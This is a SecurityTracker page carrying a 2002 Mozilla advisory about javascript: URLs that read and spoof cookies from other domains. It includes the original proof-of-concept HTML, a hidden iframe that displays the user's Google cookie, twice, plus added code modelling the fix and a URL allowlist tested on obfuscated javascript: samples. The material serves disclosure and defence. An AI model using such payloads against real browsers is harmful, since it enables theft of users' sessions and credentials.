SecurityTracker.com
Category:  Application (Web Browser)  >  Mozilla Browser Vendors:  Mozilla.org
Mozilla Web Browser Allows Javascript Code to Read and Modify Cookies from Other Domains
SecurityTracker Alert ID:  1004839
CVE Reference:  GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jul 25 2002
Impact:  Disclosure of authentication information, Disclosure of system information, Modification of authentication information, Modification of system information
Fix Available:  Yes   Exploit Included:  Yes   Vendor Confirmed:  Yes  
Version(s): Prior to 1.1 Beta (July 22, 2002)
Description:  An information disclosure vulnerability was reported in the Mozilla browser. A remote user can create code that, when run in a target user's Mozilla browser, can read cookies belonging to other domains.

It is reported that a remote user can create a specially crafted javascript URL that, when loaded by a target user's Mozilla browser, will be able to access and modify cookies on the browser belonging to different domains. A javascript URL of the following format can apparently be used:

javascript://[host]/[path]\n[code to read cookie]

According to the report, the '//' string will ensure that the host and path combination doesn't generate any javascript error messages.

A demonstration exploit is provided below. To activate the exploit, load the HTML code onto a remote web server and then load the code in the Mozilla browser.
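The scoping rule the description gives, as an added example in JavaScript that is not part of the SecurityTracker page, the advisory, or Mozilla's code: it models the reported derivation of a cookie host from the text after `javascript:` beside the correct rule that a `javascript:` URL carries no host of its own and runs with the origin of the document that navigated the frame. The host names, cookie values, `ATTACKER_PAGE`, and `PAYLOAD_URL` are constructed; how the flawed parser behaved without a `//host` prefix is an assumption and is marked as such in the code.

```javascript
// Added example, not code from the advisory or from Mozilla. It models the
// cookie-scoping rule the advisory describes ("javascript:[host][path]") so
// the flaw and the fix can be compared. Hosts and cookie values are constructed.

// Toy cookie store: one cookie string per host (constructed data).
const COOKIE_JAR = {
  "www.google.com": "PREF=constructed-google-cookie",
  "attacker.example": "session=constructed-attacker-cookie",
};

// Flawed scoping, as reported: the text after "javascript:" is treated like
// an ordinary URL and its authority becomes the cookie host, so
// "javascript://www.google.com/\n..." is scoped to www.google.com.
// Assumption: with no "//host" prefix the model yields no host at all.
function flawedCookieHost(url, navigatorHost) {
  if (!/^javascript:/i.test(url)) return new URL(url).hostname;
  const rest = url.slice("javascript:".length);
  const m = rest.match(/^\/\/([^\/\n?#\s]+)/);
  return m ? m[1].toLowerCase() : "";
}

// Correct scoping: a javascript: URL has no authority of its own; the script
// runs as the document that navigated the frame, so only that document's
// host is a valid cookie scope.
function fixedCookieHost(url, navigatorHost) {
  if (/^javascript:/i.test(url)) return navigatorHost;
  return new URL(url).hostname;
}

// Which cookies a script loaded from `url` may see under a given scoping rule.
function cookiesVisible(url, navigatorHost, scopeFn) {
  return COOKIE_JAR[scopeFn(url, navigatorHost)] || "";
}

// Why the trick produces no syntax error: "//www.google.com/" is a line
// comment to the JavaScript engine, the newline ends it, and whatever follows
// is the code that runs. Demonstrated with a harmless body.
function bodyThatRuns(jsUrl) {
  return new Function(jsUrl.slice("javascript:".length))();
}

const PAYLOAD_URL = "javascript://www.google.com/\nreturn 'ran after the comment'";
const ATTACKER_PAGE = "attacker.example"; // host of the page setting f.location

function demo() {
  return {
    flawed: cookiesVisible(PAYLOAD_URL, ATTACKER_PAGE, flawedCookieHost),
    fixed: cookiesVisible(PAYLOAD_URL, ATTACKER_PAGE, fixedCookieHost),
    executed: bodyThatRuns(PAYLOAD_URL),
  };
}

console.log(demo());
```

Under the flawed rule the script sees the www.google.com cookie even though it was launched from attacker.example; under the fixed rule it sees only the launching page's own cookie, which is the behaviour the 1.1 Beta fix restores.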

<pre>
Title: Mozilla cookie stealing/spoofing
Date: [2002-07-24]
Impact: Steal/spoof arbitrary cookie _ _
using javascript: URLs o' \,=./ `o
Author: Andreas Sandblad, sandblad@acc.umu.se (o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO- -(_)--Ooo---
This demo will display your google cookie (must exist).
</pre>

<body onload=init()>
<!-- hidden frame that is navigated to the crafted javascript: URL -->
<iframe name=f height=0 width=0 style=visibility:hidden></iframe>
<script>
function init(){
  // "//www.google.com/" is taken as the cookie host but is a JS comment;
  // the newline ends the comment and the quoted markup after it runs.
  f.location = "javascript://www.google.com/\n"+
    "'<body onload=alert(document.cookie)>'";
}
</script>

Impact:  A remote user may be able to create HTML that, when loaded, can access cookies on the Mozilla browser from other domains.
Solution:  According to the report, this problem has been fixed in Mozilla 1.1 Beta, released 02-07-22 and available at:

http://www.mozilla.org/

Vendor URL:  www.mozilla.org/ (Links to External Site)
Cause:  Access control error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  Andreas Sandblad <sandblad@acc.umu.se>
Message History:   None.


Source Message Contents

Date:  Wed, 24 Jul 2002 16:45:59 +0200 (CEST)
From:  Andreas Sandblad <sandblad@acc.umu.se>
Subject:  Mozilla cookie stealing - Sandblad advisory #9

 


                  - Sandblad advisory #9 -

---..---..---..---..---..---..---..---..---..---..---..---..----
Title:      Steal/spoof arbitrary cookie in Mozilla
Date:       [2002-07-24]
Software:   Mozilla
Vendor:     http://www.mozilla.org
Fix:        The author has been working with Mozilla
            to produce a patch. Problem is fixed in
            Mozilla 1.1 Beta released 02-07-22.
Workaround: Preferences->Advanced->Scripts & Plugins->
            Disable access to cookies using javascript
Impact:     Steal/spoof arbitrary cookie           _     _
            using javascript: URLs               o' \,=./ `o
Author:     Andreas Sandblad, sandblad@acc.umu.se   (o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---


BACKGROUND:
===========

I originally thought this was an XSS (cross site scripting) issue, but soon
came to the conclusion that it is limited to a design error in restricting
access to cookies. Even though Mozilla is open source, I have not been
studying the source code in order to find and exploit the vulnerability.

In the beginning I had problems not generating any javascript errors when
using the javascript URL. My first solution was to make the host and path
a valid javascript expression. Google.com may be a valid expression
if google is an object and com is an element/variable of the Google
object. Further on, if Google.com is an int, it is legal to use
google.com/1. Parsing of host and path will stop when a space is found.

Well, I soon found a much easier solution. Simply put a // in front of the
host and path and a \n before the cookie-reading code occurs. The reason
why I didn't find this directly was because the newline must be created in
a javascript function. It can't be set directly in a javascript URL.


DESCRIPTION:
============

Mozilla allows script in the javascript protocol to set and read cookies.
For javascript URLs the host and path for the cookie are pulled out as:
"javascript:[host][path]"

Cookie security is based only on restricting access to the correctly matching
host and path. By carefully crafting a malicious javascript URL opened in
a new frame/iframe/window, it is possible to access and alter cookies from
other domains.


DETAILS:
========

The easiest way to exploit the vulnerability is to simply create a
javascript URL in a javascript function as:
javascript://[host]/[path]\n[code to read cookie]
The // will make sure host and path don't generate any javascript errors.


EXPLOIT:
========

Instructions:
Put the exploit in a html document on a remote server and load it with
your Mozilla browser to activate the exploit.

-------------------------- CUT HERE ----------------------------
<pre>
Title:      Mozilla cookie stealing/spoofing
Date:       [2002-07-24]
Impact:     Steal/spoof arbitrary cookie           _     _
            using javascript: URLs               o' \,=./ `o
Author:     Andreas Sandblad, sandblad@acc.umu.se   (o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---
This demo will display your google cookie (must exist).
</pre>

<body onload=init()>
<iframe name=f height=0 width=0 style=visibility:hidden></iframe>
<script>
function init(){
  f.location = "javascript://www.google.com/\n"+
    "'<body onload=alert(document.cookie)>'";
}
</script>
-------------------------- CUT HERE ----------------------------


Disclaimer:
===========
Andreas Sandblad is not responsible for the misuse of the
information provided in this advisory. The opinions expressed
are my own and not of any company. In no event shall the author
be liable for any damages whatsoever arising out of or in
connection with the use or spread of this advisory. Any use of
the information is at the user's own risk.


Old advisories:
===============
#8 [2002-07-23] "Pressing CTRL in IE is dangerous"
http://online.securityfocus.com/archive/1/283866
#7 [2002-05-19] "IE dot bug"
http://online.securityfocus.com/archive/1/273168
#6 [2002-05-15] "Opera javascript protocoll vulnerability"
http://online.securityfocus.com/archive/1/272583
#5 [2002-04-26] "Mp3 file can execute code in Winamp."
http://online.securityfocus.com/archive/1/269724
#4 [2002-04-15] "Using the backbutton in IE is dangerous."
http://online.securityfocus.com/archive/1/267561


Greetings:
==========
For feedback concerning this issue:
Ingesson, Quitta, Hawkan.
For feedback I forgot to thank for, regarding last advisory:
Tys0n-


Feedback:
=========
Please send suggestions and comments to:           _     _
sandblad@acc.umu.se                              o' \,=./ `o
                                                    (o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---
Andreas Sandblad,
student in Engineering Physics at Umea University, Sweden.
-/---/---/---/---/---/---/---/---/---/---/---/---/---/---/---/--
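The advisory's workaround is a browser preference. On the application side, the standing mitigation for a site that lets users supply a URL for a link, redirect, or frame source is to refuse to hand any `javascript:` URL to the browser at all. The check below is an added example in JavaScript, not code from the advisory, SecurityTracker, or Mozilla; `APP_BASE`, `ALLOWED_SCHEMES`, and the sample inputs are constructed. It goes beyond the single URL shape in the advisory by also normalizing the case, whitespace, and embedded-newline variants that defeat a plain string-prefix test.

```javascript
// Added example, not from the advisory or from Mozilla: an allowlist check for
// user-supplied navigation targets. Sample inputs and APP_BASE are constructed.

const ALLOWED_SCHEMES = new Set(["http:", "https:"]);
const APP_BASE = "https://app.example/"; // constructed base for relative inputs

// Returns the normalized absolute URL when it is safe to navigate to, or null.
// Parsing with the WHATWG URL parser first matters: it strips leading/trailing
// control characters and embedded tabs/newlines and lowercases the scheme, so
// "  JavaScript:", "java\nscript:" and "javascript://host\n..." all normalize
// to the javascript: scheme and are rejected instead of slipping past a naive
// string-prefix test.
function safeNavigationTarget(input) {
  let parsed;
  try {
    parsed = new URL(String(input), APP_BASE);
  } catch (e) {
    return null; // unparseable input is not a navigation target
  }
  if (!ALLOWED_SCHEMES.has(parsed.protocol)) return null;
  return parsed.href;
}

// A prefix test, for comparison: it misses case, whitespace and control-char
// variants and is the kind of check the parser-based version replaces.
function naiveStartsWithCheck(input) {
  return input.startsWith("javascript:") ? null : input;
}

// Constructed inputs: the advisory's URL shape plus common obfuscations.
const SAMPLE_INPUTS = [
  "javascript://www.google.com/\nreturn 1",
  "  JaVaScRiPt:alert(1)",
  "java\nscript:alert(1)",
  "data:text/html,hello",
  "https://www.google.com/",
  "//www.google.com/",
  "/account",
];

// Each input with the verdict of both checks, so the difference is visible.
function classify() {
  return SAMPLE_INPUTS.map((input) => ({
    input,
    parserCheck: safeNavigationTarget(input),
    naiveCheck: naiveStartsWithCheck(input),
  }));
}

console.table(classify());
```

Only the http and https inputs come back non-null from the parser-based check; the naive check passes the mixed-case and split-scheme variants, which is why the scheme must be taken from a parser rather than from the raw string.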


Copyright 2002, SecurityGlobal.net LLC